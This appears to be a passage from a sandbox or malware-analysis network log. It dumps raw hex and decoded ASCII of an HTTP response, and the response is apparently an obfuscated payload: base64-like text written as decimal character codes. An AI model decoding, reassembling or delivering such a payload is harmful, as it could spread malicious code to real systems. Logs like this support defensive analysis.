                    Data Ascii: 78 0 82 0 98 0 106 0 111 0 78 0 106 0 56 0 65 0 65 0 73 0 116 0 57 0 67 0 68 0 80 0 65 0 79 0 85 0 99 0 99 0 105 0 85 0 88 0 99 0 105 0 85 0 88 0 111 0 105 0 85 0 88 0 103 0 120 0 48 0 88 0 107 0 65 0 65 0 69 0 65 0 65 0 73 0 108 0 70 0 50 0 73 0 108 0 70
                    2021-10-26 16:59:38 UTC2793INData Raw: 30 20 35 37 20 30 20 34 33 20 30 20 31 30 35 20 30 20 38 37 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 34 37 20 30 20 38 39 20 30 20 35 33 20 30 20 39 39 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 34 33 20 30 20 37 30 20 30 20 35 32 20 30 20 31 31 38 20 30 20 37 39 20 30 20 31 30 35 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 31 20 30 20 38 34 20 30 20 31 30 36 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 34 33 20 30 20 31 30 35 20 30 20 31 30 37 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 32 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 31 32 32 20 30 20 37 32 20 30 20 37 32 20 30 20 31 32 32 20 30 20 31 31
                    Data Ascii: 0 57 0 43 0 105 0 87 0 80 0 103 0 65 0 65 0 77 0 47 0 89 0 53 0 99 0 120 0 120 0 43 0 70 0 52 0 118 0 79 0 105 0 56 0 80 0 111 0 84 0 106 0 56 0 65 0 65 0 70 0 67 0 76 0 120 0 43 0 105 0 107 0 80 0 103 0 65 0 65 0 82 0 106 0 116 0 122 0 72 0 72 0 122 0 11
                    2021-10-26 16:59:38 UTC2795INData Raw: 36 20 30 20 36 36 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 39 20 30 20 34 37 20 30 20 34 39 20 30 20 36 35 20 30 20 38 31 20 30 20 35 34 20 30 20 31 32 31 20 30 20 31 30 39 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 39 37 20 30 20 36 38 20 30 20 31 31 32 20 30 20 39 38 20 30 20 38 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 38 20 30 20 35 36 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 35 30 20 30 20 34 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 38 39 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 36 20 30 20 37 30 20 30 20 37 31 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 37 20 30 20 38 31 20 30 20 36 39 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20
                    Data Ascii: 6 0 66 0 111 0 118 0 79 0 47 0 49 0 65 0 81 0 54 0 121 0 109 0 76 0 66 0 109 0 97 0 68 0 112 0 98 0 84 0 47 0 47 0 118 0 56 0 65 0 106 0 89 0 50 0 48 0 47 0 47 0 55 0 47 0 85 0 89 0 49 0 78 0 116 0 70 0 71 0 76 0 122 0 118 0 57 0 81 0 69 0 73 0 50 0 70 0
                    2021-10-26 16:59:38 UTC2799INData Raw: 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 33 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 37 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30
                    Data Ascii: 6 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 73 0 84 0 65 0 65 0 65 0 85 0 87 0 105 0 89 0 120 0 48 0 65 0 65 0 105 0 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 77 0 84 0 65 0 65 0 65 0 85 0 87 0 10
                    2021-10-26 16:59:38 UTC2803INData Raw: 20 31 31 31 20 30 20 34 33 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 34 39 20 30 20 34 33 20 30 20 36 38 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 31 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 35 31 20 30 20 35 36 20 30 20 38 35 20 30 20 38 39 20 30 20 34 39 20 30 20 37 37 20 30 20 38 30 20 30 20 31 31 39 20 30 20 37 34 20 30 20 38 32 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 39 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 37 30 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36
                    Data Ascii: 111 0 43 0 106 0 107 0 65 0 65 0 73 0 116 0 49 0 43 0 68 0 118 0 122 0 117 0 79 0 106 0 69 0 81 0 65 0 66 0 48 0 65 0 111 0 118 0 71 0 106 0 85 0 51 0 56 0 85 0 89 0 49 0 77 0 80 0 119 0 74 0 82 0 85 0 80 0 57 0 49 0 69 0 80 0 57 0 49 0 70 0 80 0 56 0 86
                    2021-10-26 16:59:38 UTC2804INData Raw: 36 20 30 20 31 30 38 20 30 20 39 39 20 30 20 31 32 32 20 30 20 35 37 20 30 20 31 31 38 20 30 20 35 36 20 30 20 38 36 20 30 20 31 31 30 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 36 20 30 20 34 33 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 38 20 30 20 31 30 34 20 30 20 39 38 20 30 20 35 35 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 38 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 31 36 20 30 20 39 38 20 30 20 31 32 32 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 34 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 6 0 108 0 99 0 122 0 57 0 118 0 56 0 86 0 110 0 77 0 66 0 65 0 65 0 71 0 106 0 43 0 65 0 81 0 65 0 65 0 105 0 47 0 105 0 78 0 104 0 98 0 55 0 57 0 47 0 47 0 57 0 87 0 85 0 71 0 97 0 74 0 116 0 98 0 122 0 57 0 47 0 47 0 47 0 111 0 118 0 74 0 85 0 65 0 65 0
                    2021-10-26 16:59:38 UTC2808INData Raw: 34 39 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 38 31 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 31 30 30 20 30 20 36 39 20 30 20 31 30 35 20 30 20 37 36 20 30 20 38 32 20 30 20 38 31 20 30 20 31 32 31 20 30 20 37 34 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 34 37 20 30 20 36 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 30 20 30 20 36 37 20 30 20 36 38 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 30 30 20 30 20 36 36 20 30 20 37 31 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 30 20
                    Data Ascii: 49 0 43 0 80 0 47 0 81 0 54 0 119 0 73 0 122 0 119 0 68 0 118 0 68 0 100 0 69 0 105 0 76 0 82 0 81 0 121 0 74 0 82 0 81 0 106 0 111 0 47 0 65 0 107 0 65 0 65 0 73 0 116 0 50 0 67 0 68 0 118 0 122 0 100 0 66 0 71 0 78 0 82 0 102 0 120 0 81 0 97 0 103 0 70
                    2021-10-26 16:59:38 UTC2812INData Raw: 38 20 30 20 39 38 20 30 20 31 31 31 20 30 20 36 38 20 30 20 31 30 32 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 31 30 38 20 30 20 37 30 20 30 20 34 33 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 35 34 20 30 20 31 32 31 20 30 20 31 31 37 20 30 20 36 38 20 30 20 34 33 20 30 20 38 31 20 30 20 31 30 38 20 30 20 34 39 20 30 20 39 37 20 30 20 31 30 33 20 30 20 38 37 20 30 20 35 30 20 30 20 38 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 35 20 30 20 37 33 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 35 36 20 30 20 37 37 20 30 20 38 30 20 30 20 31 30 34 20 30 20 37 37 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20
                    Data Ascii: 8 0 98 0 111 0 68 0 102 0 51 0 47 0 47 0 52 0 108 0 70 0 43 0 68 0 118 0 68 0 54 0 121 0 117 0 68 0 43 0 81 0 108 0 49 0 97 0 103 0 87 0 50 0 82 0 103 0 65 0 65 0 85 0 79 0 105 0 73 0 79 0 65 0 65 0 65 0 79 0 56 0 77 0 80 0 104 0 77 0 65 0 66 0 65 0 65 0
                    2021-10-26 16:59:38 UTC2816INData Raw: 35 30 20 30 20 37 30 20 30 20 35 36 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 31 30 30 20 30 20 35 36 20 30 20 38 30 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 35 20 30 20 34 39 20 30 20 31 30 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 38 36 20 30 20 31 31 34 20 30 20 31 30 33 20 30 20 36 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 39 38 20 30 20 35 31 20 30 20 31 31 39 20 30 20 34 37 20 30 20 38 30 20 30 20
                    Data Ascii: 50 0 70 0 56 0 118 0 122 0 47 0 47 0 49 0 78 0 81 0 90 0 111 0 109 0 100 0 56 0 80 0 122 0 47 0 47 0 43 0 105 0 49 0 106 0 103 0 65 0 65 0 105 0 51 0 85 0 77 0 103 0 56 0 81 0 77 0 86 0 114 0 103 0 69 0 65 0 81 0 65 0 65 0 106 0 98 0 51 0 119 0 47 0 80 0
                    2021-10-26 16:59:38 UTC2820INData Raw: 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 38 32 20 30 20 38 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 39 20 30 20 37 38 20 30 20 39 38 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 39 20 30 20 37 35 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 35 34 20 30 20 36 38 20 30 20 31 30 31 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 31 30 34 20 30 20 38 36 20 30 20 31 30 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 37 20 30 20 38 33 20 30 20 37 38 20 30 20 38 32 20 30 20 38 39 20
                    Data Ascii: 65 0 65 0 68 0 111 0 82 0 83 0 48 0 65 0 65 0 73 0 79 0 78 0 98 0 80 0 47 0 47 0 47 0 119 0 75 0 78 0 104 0 81 0 68 0 47 0 47 0 47 0 57 0 81 0 54 0 68 0 101 0 77 0 65 0 65 0 67 0 74 0 104 0 86 0 106 0 47 0 47 0 47 0 43 0 68 0 120 0 67 0 83 0 78 0 82 0 89
                    2021-10-26 16:59:38 UTC2824INData Raw: 20 34 39 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 37 20 30 20 36 37 20 30 20 37 39 20 30 20 31 31 35 20 30 20 38 35 20 30 20 39 30 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 31 30 32 20 30 20 31 30 30 20 30 20 36 35 20 30 20 37 38 20 30 20 38 38 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 30 20 30 20 38 34 20 30 20 39 37 20 30 20 36 37 20 30 20 31 32 32 20 30 20 37 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 31 30 34 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 36 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20
                    Data Ascii: 49 0 68 0 73 0 116 0 57 0 67 0 79 0 115 0 85 0 90 0 106 0 107 0 102 0 100 0 65 0 78 0 88 0 54 0 119 0 70 0 84 0 97 0 67 0 122 0 75 0 81 0 65 0 68 0 47 0 70 0 90 0 106 0 65 0 81 0 65 0 67 0 78 0 82 0 99 0 104 0 81 0 106 0 89 0 86 0 65 0 47 0 47 0 47 0 47
                    2021-10-26 16:59:38 UTC2829INData Raw: 34 37 20 30 20 35 31 20 30 20 39 39 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 38 20 30 20 31 31 31 20 30 20 37 30 20 30 20 36 37 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 37 30 20 30 20 37 39 20 30 20 31 31 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 35 31 20 30 20 34 38 20 30 20 37 37 20 30 20 39 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 31 20 30 20 38 30 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 35 33 20 30 20 39 38 20 30 20 38 38 20 30 20 34 39 20 30 20 35 31 20 30 20 36 37 20 30 20 36 37 20 30 20
                    Data Ascii: 47 0 51 0 99 0 81 0 97 0 103 0 68 0 111 0 70 0 67 0 69 0 65 0 65 0 73 0 80 0 69 0 70 0 79 0 115 0 81 0 105 0 51 0 48 0 77 0 97 0 79 0 106 0 69 0 81 0 65 0 67 0 68 0 121 0 80 0 47 0 111 0 100 0 121 0 115 0 65 0 65 0 70 0 53 0 98 0 88 0 49 0 51 0 67 0 67 0
                    2021-10-26 16:59:38 UTC2833INData Raw: 30 20 31 31 39 20 30 20 36 35 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 39 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 31 20 30 20 35 32 20 30 20 39 39 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 37 32 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 39 20 30 20 39 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 36 39 20 30 20 36 38 20 30 20 35 35 20 30 20 31 30 30 20 30 20 36 36 20 30 20 36 36 20 30 20 37 30 20 30 20 37 32 20 30 20 31 31 31 20 30 20 31 30 38 20 30 20 31 31 38
                    Data Ascii: 0 119 0 65 0 115 0 65 0 65 0 65 0 65 0 47 0 120 0 87 0 99 0 119 0 85 0 65 0 65 0 103 0 51 0 52 0 99 0 65 0 72 0 85 0 72 0 120 0 48 0 89 0 99 0 65 0 81 0 65 0 65 0 65 0 77 0 80 0 47 0 100 0 67 0 81 0 69 0 68 0 55 0 100 0 66 0 66 0 70 0 72 0 111 0 108 0 118
                    2021-10-26 16:59:38 UTC2836INData Raw: 20 30 20 37 33 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 39 30 20 30 20 36 38 20 30 20 35 34 20 30 20 35 37 20 30 20 37 38 20 30 20 37 30 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 38 38 20 30 20 38 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 34 20 30 20 36 37 20 30 20 37 36 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 38 32 20 30 20 31 31 33 20 30 20 36 36 20 30 20 36 37 20 30 20 31 31 38 20 30 20 31 30 31 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 38 39 20 30 20 36 38 20 30 20 35 34 20 30 20 35 37 20 30 20 37 30 20 30 20 36 39 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 38 38 20 30 20 38 32 20 30 20 31 30 33 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 33 20 30 20 31 31 39 20
                    Data Ascii: 0 73 0 85 0 52 0 118 0 90 0 68 0 54 0 57 0 78 0 70 0 65 0 43 0 118 0 88 0 82 0 119 0 68 0 87 0 104 0 67 0 76 0 101 0 103 0 82 0 113 0 66 0 67 0 118 0 101 0 85 0 52 0 118 0 89 0 68 0 54 0 57 0 70 0 69 0 65 0 43 0 118 0 88 0 82 0 103 0 68 0 87 0 103 0 119
                    2021-10-26 16:59:38 UTC2840INData Raw: 30 20 31 31 39 20 30 20 36 39 20 30 20 36 38 20 30 20 36 37 20 30 20 36 38 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 39 20 30 20 36 38 20 30 20 31 30 32 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 30 20 30 20 38 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 37 33 20 30 20 35 34 20 30 20 37 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 32 20 30 20 38 31 20 30 20 38 33 20 30 20 34 37 20 30 20 34 38 20 30 20 39 39 20 30 20 37 37 20 30 20 31 30 35 20 30 20 35 31 20 30 20 31 31 39 20 30 20 31 30 37 20 30 20 36 38 20 30 20 37 30 20 30 20 36 37 20 30 20 37 36 20 30 20 38
                    Data Ascii: 0 119 0 69 0 68 0 67 0 68 0 65 0 66 0 88 0 105 0 47 0 109 0 68 0 102 0 119 0 81 0 65 0 100 0 82 0 47 0 47 0 100 0 67 0 81 0 73 0 54 0 70 0 118 0 47 0 47 0 47 0 43 0 70 0 119 0 72 0 81 0 83 0 47 0 48 0 99 0 77 0 105 0 51 0 119 0 107 0 68 0 70 0 67 0 76 0 8
                    2021-10-26 16:59:38 UTC2844INData Raw: 20 31 31 33 20 30 20 36 37 20 30 20 31 30 38 20 30 20 31 30 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 33 20 30 20 34 39 20 30 20 35 37 20 30 20 35 30 20 30 20 38 30 20 30 20 37 39 20 30 20 31 31 34 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 34 38 20 30 20 34 38 20 30 20 38 35 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 38 35 20 30 20 37 37 20 30 20 35 36 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 30 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 32 20 30 20 38 33 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 30 20 30 20 38 32 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30
                    Data Ascii: 113 0 67 0 108 0 107 0 122 0 119 0 73 0 49 0 57 0 50 0 80 0 79 0 114 0 105 0 48 0 85 0 81 0 105 0 48 0 48 0 85 0 105 0 85 0 88 0 85 0 77 0 56 0 67 0 74 0 82 0 100 0 105 0 74 0 82 0 100 0 121 0 74 0 82 0 102 0 83 0 78 0 82 0 100 0 82 0 81 0 47 0 51 0 85 0
                    2021-10-26 16:59:38 UTC2848INData Raw: 39 20 30 20 35 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 38 30 20 30 20 37 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 34 38 20 30 20 35 35 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 34 20 30 20 37 34 20 30 20 31 30 36 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 32 20 30 20 38 38 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 37 34 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 38 31 20 30 20 36 35 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 38 39 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20
                    Data Ascii: 9 0 55 0 47 0 47 0 43 0 103 0 80 0 77 0 103 0 65 0 65 0 106 0 89 0 85 0 48 0 55 0 118 0 47 0 47 0 54 0 74 0 106 0 122 0 47 0 47 0 57 0 102 0 88 0 108 0 118 0 74 0 119 0 103 0 81 0 65 0 86 0 89 0 118 0 115 0 103 0 101 0 119 0 89 0 67 0 65 0 65 0 65 0 85 0
                    2021-10-26 16:59:38 UTC2852INData Raw: 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 34 39 20 30 20 31 31 38 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 35 37 20 30 20 34 39 20 30 20 38 30 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 37 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 39 37 20 30 20 38 30 20 30 20 35 32 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 39 38 20 30 20 34 39 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20
                    Data Ascii: 65 0 65 0 73 0 50 0 70 0 49 0 118 0 51 0 47 0 47 0 49 0 100 0 81 0 90 0 111 0 109 0 57 0 49 0 80 0 51 0 47 0 47 0 43 0 103 0 77 0 101 0 103 0 65 0 65 0 103 0 56 0 81 0 77 0 97 0 80 0 52 0 72 0 65 0 65 0 67 0 78 0 104 0 100 0 98 0 49 0 47 0 47 0 57 0 88 0
                    2021-10-26 16:59:38 UTC2856INData Raw: 20 30 20 31 31 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 34 39 20 30 20 34 37 20 30 20 37 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 35 37 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 32 20 30 20 31 31 38 20 30 20 31 30 38 20 30 20 38 38 20 30 20 39 39 20 30 20 37 33 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 38 20 30 20 37 34 20 30 20 36 35 20 30 20 38 34 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 30 36 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 37 20 30 20 31 30 33 20 30 20 38 30 20 30 20 39 38 20 30 20 38 39 20 30 20 37 31 20 30 20 35 36 20 30
                    Data Ascii: 0 118 0 47 0 100 0 81 0 122 0 47 0 100 0 81 0 106 0 111 0 49 0 47 0 76 0 47 0 47 0 49 0 57 0 101 0 87 0 52 0 118 0 108 0 88 0 99 0 73 0 77 0 65 0 80 0 57 0 48 0 74 0 65 0 84 0 47 0 70 0 102 0 106 0 66 0 81 0 65 0 65 0 107 0 103 0 80 0 98 0 89 0 71 0 56 0
                    2021-10-26 16:59:38 UTC2861INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 34 39 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 38 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 39 39 20 30 20 36 39 20 30 20 37 34 20 30 20 37 39 20 30 20 31 31 31 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 34 39 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 37 20 30 20 35 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 39 39 20 30 20 36 39 20 30 20 37 34 20 30 20 38 30 20 30 20 36 39 20 30 20 36 38 20 30 20 36 35 20
                    Data Ascii: 0 65 0 65 0 68 0 47 0 100 0 104 0 68 0 47 0 49 0 49 0 68 0 111 0 122 0 88 0 65 0 65 0 65 0 77 0 99 0 69 0 74 0 79 0 111 0 68 0 65 0 65 0 68 0 47 0 100 0 104 0 68 0 47 0 49 0 49 0 68 0 111 0 117 0 51 0 65 0 65 0 65 0 77 0 99 0 69 0 74 0 80 0 69 0 68 0 65
                    2021-10-26 16:59:38 UTC2865INData Raw: 20 30 20 38 30 20 30 20 35 32 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 31 32 30 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 35 32 20 30 20 38 39 20 30 20 31 31 31 20 30 20 38 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 30 20 30 20 38 38 20 30 20 35 31 20 30 20 38 31 20 30 20 37 34 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 31 30 30 20 30 20 36 35 20 30 20 38 31 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 31 35 20 30 20 36 38 20 30 20 37 37 20 30 20 35 36 20 30 20 36 36 20 30 20 36 35 20 30 20 38 35
